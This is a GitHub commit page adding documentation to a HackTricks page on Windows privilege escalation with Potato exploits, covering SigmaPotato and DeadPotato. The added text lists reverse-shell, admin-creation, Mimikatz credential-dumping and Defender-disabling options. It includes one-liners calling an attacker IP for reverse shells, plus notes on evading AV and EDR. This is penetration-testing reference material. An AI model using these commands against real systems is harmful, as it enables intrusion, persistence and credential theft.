Skip to content

Commit 90831f0

Browse files
author
HackTricks News Bot
committed
Add content from: Research Update: Enhanced src/windows-hardening/windows-loca...
1 parent 35f63f5 commit 90831f0

1 file changed

Lines changed: 35 additions & 0 deletions

File tree

src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

Lines changed: 35 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -42,6 +42,7 @@ Operational notes:
4242
- RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag.
4343
- EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon).
4444
- Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; try a different pipe/transport or ensure the target service is running.
45+
- “Kitchen-sink” forks such as DeadPotato bundle extra payload modules (Mimikatz/SharpHound/Defender off) which touch disk; expect higher EDR detection compared to the slim originals.
4546

4647
## Quick Demo
4748

@@ -188,6 +189,39 @@ SigmaPotato adds modern niceties like in-memory execution via .NET reflection an
188189
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
189190
```
190191
192+
Additional perks in 2024–2025 builds (v1.2.x):
193+
- Built-in reverse shell flag `--revshell` and removal of the 1024-char PowerShell limit so you can fire long AMSI-bypassing payloads in one go.
194+
- Reflection-friendly syntax (`[SigmaPotato]::Main()`), plus a rudimentary AV evasion trick via `VirtualAllocExNuma()` to throw off simple heuristics.
195+
- Separate `SigmaPotatoCore.exe` compiled against .NET 2.0 for PowerShell Core environments.
196+
197+
### DeadPotato (2024 GodPotato rework with modules)
198+
199+
DeadPotato keeps the GodPotato OXID/DCOM impersonation chain but bakes in post-exploitation helpers so operators can immediately take SYSTEM and perform persistence/collection without additional tooling.
200+
201+
Common modules (all require SeImpersonatePrivilege):
202+
203+
- `-cmd "<cmd>"` — spawn arbitrary command as SYSTEM.
204+
- `-rev <ip:port>` — quick reverse shell.
205+
- `-newadmin user:pass` — create a local admin for persistence.
206+
- `-mimi sam|lsa|all` — drop and run Mimikatz to dump credentials (touches disk, noisy).
207+
- `-sharphound` — run SharpHound collection as SYSTEM.
208+
- `-defender off` — flip Defender real-time protection (very noisy).
209+
210+
Example one-liners:
211+
212+
```cmd
213+
# Blind reverse shell
214+
DeadPotato.exe -rev 10.10.14.7:4444
215+
216+
# Drop an admin for later login
217+
DeadPotato.exe -newadmin pwned:P@ssw0rd!
218+
219+
# Run SharpHound immediately after priv-esc
220+
DeadPotato.exe -sharphound
221+
```
222+
223+
Because it ships extra binaries, expect higher AV/EDR flags; use the slimmer GodPotato/SigmaPotato when stealth matters.
224+
191225
## References
192226
193227
- [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
@@ -203,5 +237,6 @@ SigmaPotato adds modern niceties like in-memory execution via .NET reflection an
203237
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
204238
- [BeichenDream/PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato)
205239
- [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
240+
- [DeadPotato – GodPotato rework with built-in post-ex modules](https://github.com/lypd0/DeadPotato)
206241
207242
{{#include ../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)